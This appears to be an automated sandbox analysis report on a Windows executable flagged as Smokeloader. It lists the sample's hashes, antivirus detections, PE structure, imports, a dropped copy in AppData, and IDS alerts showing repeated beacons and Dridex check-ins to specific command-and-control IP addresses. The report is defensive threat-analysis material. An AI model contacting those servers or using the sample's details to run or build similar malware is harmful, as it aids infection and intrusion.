                                        • Antivirus: Avira, Detection: 100%
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        Reputation:low
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............._..._..._..L_..._..y_..._..x_..._.A_..._..._S.._..}_..._..H_..._..O_..._Rich..._........................PE..L......e.............................9............@.........................................................................u..P....................................u..............................Xl..@............................................text............................... ..`.rdata..R...........................@..@.data............^...t..............@....fulocu.............................@..@.soro...............................@..@.kefef..............................@....rsrc...............................@..@........................................................................................................................................................................................................................................

                                        C:\Users\user\AppData\Roaming\teihrdr

                                        Download File
                                        Process:C:\Windows\explorer.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):447488
                                        Entropy (8bit):6.349979284586235
                                        Encrypted:false
                                        SSDEEP:6144:zwtN955b+GARrBUNLMmAjgRkRXsmZabQTdVjtga4opTT:zuNL5aGyUBMmAjnFZpptLT
                                        MD5:D0D4805488E7E745515FFF2165D3CC05
                                        SHA1:0CEBEC529DE0430C9E897F740700B27C043A8552
                                        SHA-256:E684BED5B84F09DD85A88A7847FB4AAED9845F9B8098F0DDA486A095A3115D4C
                                        SHA-512:5A7DEBE1760FBEF5FCA9D0A1326F4BCF4336540FFA7956232F0AD380605CD99637AF769BCA7D0F91BB1C26FFC094968D6471A4427412041ECBA7F9FB5B93719C
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Avira, Detection: 100%
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 32%
                                        Reputation:low
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............._..._..._..L_..._..y_..._..x_..._.A_..._..._S.._..}_..._..H_..._..O_..._Rich..._........................PE..L....V.f.............................9............@..........................................................................|..P...................................X|...............................r..@............................................text............................... ..`.rdata..............................@..@.data............^...z..............@....gol................................@..@.xowujad............................@..@.xonag..............................@....rsrc...............................@..@........................................................................................................................................................................................................................................

                                        C:\Users\user\AppData\Roaming\teihrdr:Zone.Identifier

                                        Download File
                                        Process:C:\Windows\explorer.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):26
                                        Entropy (8bit):3.95006375643621
                                        Encrypted:false
                                        SSDEEP:3:ggPYV:rPYV
                                        MD5:187F488E27DB4AF347237FE461A079AD
                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                        Malicious:true
                                        Reputation:high, very likely benign file
                                        Preview:[ZoneTransfer]....ZoneId=0

                                        Static File Info

                                        General

                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Entropy (8bit):6.349979284586235
                                        TrID:
                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                        • DOS Executable Generic (2002/1) 0.02%
                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                        File name:BzLGqYKy7o.exe
                                        File size:447'488 bytes
                                        MD5:d0d4805488e7e745515fff2165d3cc05
                                        SHA1:0cebec529de0430c9e897f740700b27c043a8552
                                        SHA256:e684bed5b84f09dd85a88a7847fb4aaed9845f9b8098f0dda486a095a3115d4c
                                        SHA512:5a7debe1760fbef5fca9d0a1326f4bcf4336540ffa7956232f0ad380605cd99637af769bca7d0f91bb1c26ffc094968d6471a4427412041ecba7f9fb5b93719c
                                        SSDEEP:6144:zwtN955b+GARrBUNLMmAjgRkRXsmZabQTdVjtga4opTT:zuNL5aGyUBMmAjnFZpptLT
                                        TLSH:8294BF02A6F1BC60F52266B18E2AD7EC355EFC419E18675F23197F1F18722E1D6327A0
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............._..._..._..L_..._..y_..._..x_..._..A_..._..._S.._..}_..._..H_..._..O_..._Rich..._........................PE..L....V.f...

                                        File Icon

                                        Icon Hash:49294955554d610d

                                        Static PE Info

                                        General

                                        Entrypoint:0x4039a0
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                        DLL Characteristics:TERMINAL_SERVER_AWARE
                                        Time Stamp:0x6616568B [Wed Apr 10 09:06:19 2024 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:5
                                        OS Version Minor:1
                                        File Version Major:5
                                        File Version Minor:1
                                        Subsystem Version Major:5
                                        Subsystem Version Minor:1
                                        Import Hash:6e15f2578101cc821c000ba42c1b85a8

                                        Entrypoint Preview

                                        Instruction
                                        call 00007F470C6DAF1Ah
                                        jmp 00007F470C6D81BEh
                                        push dword ptr [0044EFB8h]
                                        call dword ptr [0040D110h]
                                        test eax, eax
                                        je 00007F470C6D8334h
                                        call eax
                                        push 00000019h
                                        call 00007F470C6DA5B7h
                                        push 00000001h
                                        push 00000000h
                                        call 00007F470C6D7CE9h
                                        add esp, 0Ch
                                        jmp 00007F470C6D7CAEh
                                        mov edi, edi
                                        push ebp
                                        mov ebp, esp
                                        sub esp, 20h
                                        mov eax, dword ptr [ebp+08h]
                                        push esi
                                        push edi
                                        push 00000008h
                                        pop ecx
                                        mov esi, 0040D390h
                                        lea edi, dword ptr [ebp-20h]
                                        rep movsd
                                        mov dword ptr [ebp-08h], eax
                                        mov eax, dword ptr [ebp+0Ch]
                                        pop edi
                                        mov dword ptr [ebp-04h], eax
                                        pop esi
                                        test eax, eax
                                        je 00007F470C6D833Eh
                                        test byte ptr [eax], 00000008h
                                        je 00007F470C6D8339h
                                        mov dword ptr [ebp-0Ch], 01994000h
                                        lea eax, dword ptr [ebp-0Ch]
                                        push eax
                                        push dword ptr [ebp-10h]
                                        push dword ptr [ebp-1Ch]
                                        push dword ptr [ebp-20h]
                                        call dword ptr [0040D144h]
                                        leave
                                        retn 0008h
                                        mov edi, edi
                                        push ebp
                                        mov ebp, esp
                                        push ecx
                                        push ebx
                                        mov eax, dword ptr [ebp+0Ch]
                                        add eax, 0Ch
                                        mov dword ptr [ebp-04h], eax
                                        mov ebx, dword ptr fs:[00000000h]
                                        mov eax, dword ptr [ebx]
                                        mov dword ptr fs:[00000000h], eax
                                        mov eax, dword ptr [ebp+08h]
                                        mov ebx, dword ptr [ebp+0Ch]
                                        mov ebp, dword ptr [ebp-04h]
                                        mov esp, dword ptr [ebx-04h]
                                        jmp eax
                                        pop ebx
                                        leave
                                        retn 0008h
                                        pop eax
                                        pop ecx
                                        xchg dword ptr [esp], eax
                                        jmp eax
                                        pop eax
                                        pop ecx
                                        xchg dword ptr [esp], eax
                                        jmp eax
                                        pop eax
                                        pop ecx
                                        xchg dword ptr [esp], eax
                                        jmp eax

                                        Rich Headers

                                        Programming Language:
                                        • [ASM] VS2010 build 30319
                                        • [C++] VS2010 build 30319
                                        • [ C ] VS2010 build 30319
                                        • [IMP] VS2008 SP1 build 30729
                                        • [RES] VS2010 build 30319
                                        • [LNK] VS2010 build 30319

                                        Data Directories

                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x47c080x50.rdata
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x5d0000x1f1a8.rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x47c580x1c.rdata
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x472b00x40.rdata
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IAT0xd0000x1d0.rdata
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                        Sections

                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                        .text0x10000xbdad0xbe005e2dcfacb98721a0c8099d8c142d6e52False0.6075863486842106data6.709568594890225IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                        .rdata0xd0000x3b6b20x3b8008c683d4899b1eea99d0c0c894d3ae42fFalse0.7530938156512605data6.875369810081216IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .data0x490000x10a000x5e00dd6946c771454473442f5f63e7083b90False0.08431682180851063data1.099697366277395IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .gol0x5a0000x4000x4000f343b0931126a20f133d67c2b018a3bFalse0.0166015625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .xowujad0x5b0000xd60x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .xonag0x5c0000x4000x4000f343b0931126a20f133d67c2b018a3bFalse0.0166015625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .rsrc0x5d0000x1f1a80x1f200210ea3fb05c74ca583491c35953e8b69False0.42537336847389556data5.043242607048044IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                        Resources

                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                        RT_CURSOR0x76b380x330Device independent bitmap graphic, 48 x 96 x 1, image size 00.1948529411764706
                                        RT_CURSOR0x76e680x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.33223684210526316
                                        RT_CURSOR0x76fc00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.2953091684434968
                                        RT_CURSOR0x77e680x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.46705776173285196
                                        RT_CURSOR0x787100x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5361271676300579
                                        RT_CURSOR0x78ca80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.30943496801705755
                                        RT_CURSOR0x79b500x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.427797833935018
                                        RT_CURSOR0x7a3f80x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5469653179190751
                                        RT_ICON0x5da800xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilIndia0.3718017057569296
                                        RT_ICON0x5da800xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilSri Lanka0.3718017057569296
                                        RT_ICON0x5e9280x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilIndia0.45893501805054154
                                        RT_ICON0x5e9280x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilSri Lanka0.45893501805054154
                                        RT_ICON0x5f1d00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilIndia0.45794930875576034
                                        RT_ICON0x5f1d00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilSri Lanka0.45794930875576034
                                        RT_ICON0x5f8980x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilIndia0.45809248554913296
                                        RT_ICON0x5f8980x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilSri Lanka0.45809248554913296
                                        RT_ICON0x5fe000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilIndia0.2704356846473029
                                        RT_ICON0x5fe000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilSri Lanka0.2704356846473029
                                        RT_ICON0x623a80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilIndia0.30558161350844276
                                        RT_ICON0x623a80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilSri Lanka0.30558161350844276
                                        RT_ICON0x634500x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilIndia0.3608156028368794
                                        RT_ICON0x634500x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilSri Lanka0.3608156028368794
                                        RT_ICON0x639200xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilIndia0.5621002132196162
                                        RT_ICON0x639200xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilSri Lanka0.5621002132196162
                                        RT_ICON0x647c80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilIndia0.5464801444043321
                                        RT_ICON0x647c80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilSri Lanka0.5464801444043321
                                        RT_ICON0x650700x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilIndia0.6221098265895953
                                        RT_ICON0x650700x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilSri Lanka0.6221098265895953
                                        RT_ICON0x655d80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilIndia0.46255186721991703
                                        RT_ICON0x655d80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilSri Lanka0.46255186721991703
                                        RT_ICON0x67b800x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilIndia0.4901500938086304
                                        RT_ICON0x67b800x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilSri Lanka0.4901500938086304
                                        RT_ICON0x68c280x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilIndia0.494672131147541
                                        RT_ICON0x68c280x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilSri Lanka0.494672131147541
                                        RT_ICON0x695b00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilIndia0.449468085106383
                                        RT_ICON0x695b00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilSri Lanka0.449468085106383
                                        RT_ICON0x69a800xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilIndia0.376865671641791
                                        RT_ICON0x69a800xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilSri Lanka0.376865671641791
                                        RT_ICON0x6a9280x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilIndia0.506768953068592
                                        RT_ICON0x6a9280x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilSri Lanka0.506768953068592
                                        RT_ICON0x6b1d00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilIndia0.5702764976958525
                                        RT_ICON0x6b1d00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilSri Lanka0.5702764976958525
                                        RT_ICON0x6b8980x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilIndia0.5816473988439307
                                        RT_ICON0x6b8980x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilSri Lanka0.5816473988439307
                                        RT_ICON0x6be000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilIndia0.37053941908713695
                                        RT_ICON0x6be000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilSri Lanka0.37053941908713695
                                        RT_ICON0x6e3a80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilIndia0.4129924953095685
                                        RT_ICON0x6e3a80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilSri Lanka0.4129924953095685
                                        RT_ICON0x6f4500x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilIndia0.4012295081967213
                                        RT_ICON0x6f4500x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilSri Lanka0.4012295081967213
                                        RT_ICON0x6fdd80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilIndia0.4716312056737589
                                        RT_ICON0x6fdd80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilSri Lanka0.4716312056737589
                                        RT_ICON0x702b80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTamilIndia0.3773987206823028
                                        RT_ICON0x702b80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTamilSri Lanka0.3773987206823028
                                        RT_ICON0x711600x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTamilIndia0.5248194945848376
                                        RT_ICON0x711600x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTamilSri Lanka0.5248194945848376
                                        RT_ICON0x71a080x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTamilIndia0.6042626728110599
                                        RT_ICON0x71a080x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTamilSri Lanka0.6042626728110599
                                        RT_ICON0x720d00x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTamilIndia0.6596820809248555
                                        RT_ICON0x720d00x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTamilSri Lanka0.6596820809248555
                                        RT_ICON0x726380x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600TamilIndia0.4900414937759336
                                        RT_ICON0x726380x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600TamilSri Lanka0.4900414937759336
                                        RT_ICON0x74be00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224TamilIndia0.5082082551594747
                                        RT_ICON0x74be00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224TamilSri Lanka0.5082082551594747
                                        RT_ICON0x75c880x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400TamilIndia0.48811475409836064
                                        RT_ICON0x75c880x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400TamilSri Lanka0.48811475409836064
                                        RT_ICON0x766100x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088TamilIndia0.5407801418439716
                                        RT_ICON0x766100x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088TamilSri Lanka0.5407801418439716
                                        RT_STRING0x7abe80x370dataTamilIndia0.4681818181818182
                                        RT_STRING0x7abe80x370dataTamilSri Lanka0.4681818181818182
                                        RT_STRING0x7af580x6c0dataTamilIndia0.43344907407407407
                                        RT_STRING0x7af580x6c0dataTamilSri Lanka0.43344907407407407
                                        RT_STRING0x7b6180x37cdataTamilIndia0.45067264573991034
                                        RT_STRING0x7b6180x37cdataTamilSri Lanka0.45067264573991034
                                        RT_STRING0x7b9980x590dataTamilIndia0.43820224719101125
                                        RT_STRING0x7b9980x590dataTamilSri Lanka0.43820224719101125
                                        RT_STRING0x7bf280x27edataTamilIndia0.49059561128526646
                                        RT_STRING0x7bf280x27edataTamilSri Lanka0.49059561128526646
                                        RT_ACCELERATOR0x76af00x48dataTamilIndia0.8472222222222222
                                        RT_ACCELERATOR0x76af00x48dataTamilSri Lanka0.8472222222222222
                                        RT_GROUP_CURSOR0x76f980x22data1.0294117647058822
                                        RT_GROUP_CURSOR0x78c780x30data0.9375
                                        RT_GROUP_CURSOR0x7a9600x30data0.9375
                                        RT_GROUP_ICON0x69a180x68dataTamilIndia0.7019230769230769
                                        RT_GROUP_ICON0x69a180x68dataTamilSri Lanka0.7019230769230769
                                        RT_GROUP_ICON0x638b80x68dataTamilIndia0.6826923076923077
                                        RT_GROUP_ICON0x638b80x68dataTamilSri Lanka0.6826923076923077
                                        RT_GROUP_ICON0x702400x76dataTamilIndia0.6779661016949152
                                        RT_GROUP_ICON0x702400x76dataTamilSri Lanka0.6779661016949152
                                        RT_GROUP_ICON0x76a780x76dataTamilIndia0.6779661016949152
                                        RT_GROUP_ICON0x76a780x76dataTamilSri Lanka0.6779661016949152
                                        RT_VERSION0x7a9900x258data0.5416666666666666

                                        Imports

                                        DLLImport
                                        KERNEL32.dllGlobalCompact, InterlockedIncrement, InterlockedDecrement, SetEnvironmentVariableW, CreateJobObjectW, QueryDosDeviceA, InterlockedCompareExchange, SetVolumeMountPointW, GetComputerNameW, GetTimeFormatA, GetTickCount, CreateNamedPipeW, LocalFlags, GetNumberFormatA, SetFileTime, ClearCommBreak, TlsSetValue, GetEnvironmentStrings, SetFileShortNameW, LoadLibraryW, CopyFileW, _hread, GetCalendarInfoA, SetVolumeMountPointA, GetVersionExW, GetFileAttributesA, GetModuleFileNameW, CreateActCtxA, GetEnvironmentVariableA, GetShortPathNameA, LCMapStringA, GetConsoleAliasExesA, GetStdHandle, GetLogicalDriveStringsA, GetLastError, GetCurrentDirectoryW, GetProcAddress, EnumSystemCodePagesW, SetComputerNameA, SetFileAttributesA, LoadLibraryA, InterlockedExchangeAdd, LocalAlloc, CreateHardLinkW, GetNumberFormatW, CreateEventW, OpenEventA, FoldStringW, GlobalWire, EnumDateFormatsW, GetShortPathNameW, SetCalendarInfoA, SetProcessShutdownParameters, GetDiskFreeSpaceExA, ReadConsoleInputW, GetCurrentProcessId, DebugBreak, GetTempPathA, CommConfigDialogW, GetLocaleInfoA, SetFilePointer, VerifyVersionInfoW, EnumCalendarInfoA, EncodePointer, DecodePointer, Sleep, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, HeapFree, HeapReAlloc, GetModuleHandleW, ExitProcess, GetCommandLineW, HeapSetInformation, GetStartupInfoW, RaiseException, RtlUnwind, HeapAlloc, WideCharToMultiByte, LCMapStringW, MultiByteToWideChar, GetCPInfo, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, TerminateProcess, GetCurrentProcess, HeapCreate, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsFree, SetLastError, GetCurrentThreadId, WriteFile, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetHandleCount, GetFileType, QueryPerformanceCounter, GetSystemTimeAsFileTime, HeapSize, GetACP, GetOEMCP, IsValidCodePage, GetStringTypeW
                                        GDI32.dllCreateDCW, GetCharWidth32A, GetCharWidthI
                                        WINHTTP.dllWinHttpOpen

                                        Possible Origin

                                        Language of compilation systemCountry where language is spokenMap
                                        TamilIndia
                                        TamilSri Lanka

                                        Network Behavior

                                        Suricata IDS Alerts

                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                        2024-10-07T14:59:24.450425+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549770105.197.97.24780TCP
                                        2024-10-07T14:59:25.374466+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549776105.197.97.24780TCP
                                        2024-10-07T14:59:26.314240+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549782105.197.97.24780TCP
                                        2024-10-07T14:59:27.265046+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549788105.197.97.24780TCP
                                        2024-10-07T14:59:28.193590+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549794105.197.97.24780TCP
                                        2024-10-07T14:59:29.130090+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549804105.197.97.24780TCP
                                        2024-10-07T14:59:30.253391+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549810105.197.97.24780TCP
                                        2024-10-07T14:59:31.176635+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549814105.197.97.24780TCP
                                        2024-10-07T14:59:32.219133+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549822105.197.97.24780TCP
                                        2024-10-07T14:59:33.173977+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549831105.197.97.24780TCP
                                        2024-10-07T14:59:34.105790+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549837105.197.97.24780TCP
                                        2024-10-07T14:59:35.044145+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549844105.197.97.24780TCP
                                        2024-10-07T14:59:35.980167+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549850105.197.97.24780TCP
                                        2024-10-07T14:59:37.313136+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549856105.197.97.24780TCP
                                        2024-10-07T14:59:38.356354+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549867105.197.97.24780TCP
                                        2024-10-07T14:59:39.269702+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549868105.197.97.24780TCP
                                        2024-10-07T14:59:40.231913+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549874105.197.97.24780TCP
                                        2024-10-07T14:59:41.192149+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549885105.197.97.24780TCP
                                        2024-10-07T14:59:42.137608+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549891105.197.97.24780TCP
                                        2024-10-07T14:59:43.085742+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549897105.197.97.24780TCP
                                        2024-10-07T14:59:44.028780+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549903105.197.97.24780TCP
                                        2024-10-07T14:59:44.972761+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549910105.197.97.24780TCP
                                        2024-10-07T14:59:45.907705+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549916105.197.97.24780TCP
                                        2024-10-07T14:59:47.047276+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549922105.197.97.24780TCP
                                        2024-10-07T14:59:49.566919+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549939105.197.97.24780TCP
                                        2024-10-07T14:59:50.521037+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549945105.197.97.24780TCP
                                        2024-10-07T14:59:51.497852+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549952105.197.97.24780TCP
                                        2024-10-07T14:59:52.661203+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549961105.197.97.24780TCP
                                        2024-10-07T14:59:53.588010+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549969105.197.97.24780TCP
                                        2024-10-07T14:59:54.529610+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549975105.197.97.24780TCP
                                        2024-10-07T14:59:56.016097+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549979105.197.97.24780TCP
                                        2024-10-07T14:59:57.166667+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549982105.197.97.24780TCP
                                        2024-10-07T14:59:58.325335+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549993105.197.97.24780TCP
                                        2024-10-07T14:59:59.253273+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549998105.197.97.24780TCP
                                        2024-10-07T15:00:14.419801+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.550012188.40.141.211443TCP
                                        2024-10-07T15:00:14.715498+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.550012188.40.141.211443TCP
                                        2024-10-07T15:00:16.825302+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.550013188.40.141.211443TCP
                                        2024-10-07T15:00:18.334781+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.550013188.40.141.211443TCP
                                        2024-10-07T15:01:05.953100+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.550014105.197.97.24780TCP
                                        2024-10-07T15:01:15.348447+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.550015105.197.97.24780TCP
                                        2024-10-07T15:01:27.089587+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.550016105.197.97.24780TCP
                                        2024-10-07T15:01:32.047885+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.550017188.40.141.211443TCP
                                        2024-10-07T15:01:32.309002+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.550017188.40.141.211443TCP
                                        2024-10-07T15:01:33.047947+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.550018188.40.141.211443TCP
                                        2024-10-07T15:01:33.325361+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.550018188.40.141.211443TCP
                                        2024-10-07T15:01:46.179545+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.550019105.197.97.24780TCP
                                        2024-10-07T15:01:54.998397+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.550020188.40.141.211443TCP
                                        2024-10-07T15:01:55.268074+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.550020188.40.141.211443TCP
                                        2024-10-07T15:01:56.212271+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.550021188.40.141.211443TCP
                                        2024-10-07T15:01:56.460168+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.550021188.40.141.211443TCP
                                        2024-10-07T15:02:07.860198+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.550022189.195.132.13480TCP
